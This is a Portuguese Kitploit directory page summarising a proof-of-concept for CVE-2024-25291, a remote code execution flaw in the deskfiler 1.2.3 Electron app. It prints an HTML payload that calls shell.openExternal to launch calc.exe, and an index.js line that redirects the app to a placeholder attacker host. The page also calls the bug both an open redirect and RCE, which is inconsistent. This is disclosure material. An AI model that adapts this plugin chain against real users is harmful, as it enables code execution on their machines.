Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-25291 — deskfiler 1.2.3 Open Redirect exploit | Kitploit
Ferramentas/GitHubGitHub/eqstlab/cve-2024-25291
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubeqstlab/cve-2024-25291

CVE-2024-25291

deskfiler 1.2.3 Open Redirect exploit

Ver Repositório
há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

DeskFiler RCE

Uma Prova de Conceito para a vulnerabilidade CVE-2024-25291.

deskfiler - 1.2.3 permite Electron webview na aplicação, resultando em execução remota de código. Neste repositório há um exemplo de aplicação vulnerável e um exploit de prova de conceito (POC) da mesma.

Como PoC, há um arquivo python que automatiza o processo.

1.Vunerability Overview:

  • Assunto da Vulnerabilidade: Redirecionamento Aberto via RCE
  • Versão da Vulnerabilidade: deskfiler-1.2.3
  • Manifestação do Problema: Electron Webview
  • Tipo de Ataque: Execução Remota de Código
  • Vetores de Ataque: Para explorar a vulnerabilidade, alguém deve abrir um plug-in.
  • Número CVE Reservado: CVE-2024-25291

2. Causa da Vulnerabilidade:

  • Explicação do Exploit
    • Em uma seção específica dentro da aplicação, foi confirmada uma seção que acessa um link externo através de uma Webview via electron. Portanto, através disso, é possível alcançar um RCE conectando-se ao servidor do atacante

Prova de conceito (POC)

  • Passo 1) Preparar o servidor do atacante e criar um Plug-in Malicioso.
root@kitploit:~
<html>
 <head>
 <title>jruru</title>
 </head>
 <body>
 <script>
 const { shell } = require('electron');
 shell.openExternal('file:C:/Windows/System32/calc.exe');
 </script>
 </body>
 </html>

※ Se quiser testar rapidamente, crie um servidor no PC do atacante com o seguinte código.

root@kitploit:~
$ python -m http.server 80

Nota: ※ Neste momento, assume-se que o plug-in é um plug-in gerado pelo atacante, e é apenas um plug-in normal com um código adicionado para permitir o acesso ao servidor do atacante. BareBone foi selecionado para testes simples. deskfiler1

Em seguida, adicione o seguinte código ao arquivo index.js no caminho da pasta BareBone.

root@kitploit:~
window.location='http://[attacker_ip]/hack.html'
  • Passo 2) No servidor da vítima, execute Deskfiler e instale o plug-in BareBone através de "Add new plugin." deskfiler2

deskfiler3


3. Informações Adicionais

Nesta PoC, utilizamos um plug-in; no entanto, acreditamos que com vetores de ataque alternativos, é possível alcançar Execução Remota de Código (RCE) de forma independente. Além disso, se existirem vulnerabilidades no lado do servidor, como XSS Armazenado, XSS Refletido, o RCE também é considerado viável.

Baixar ferramenta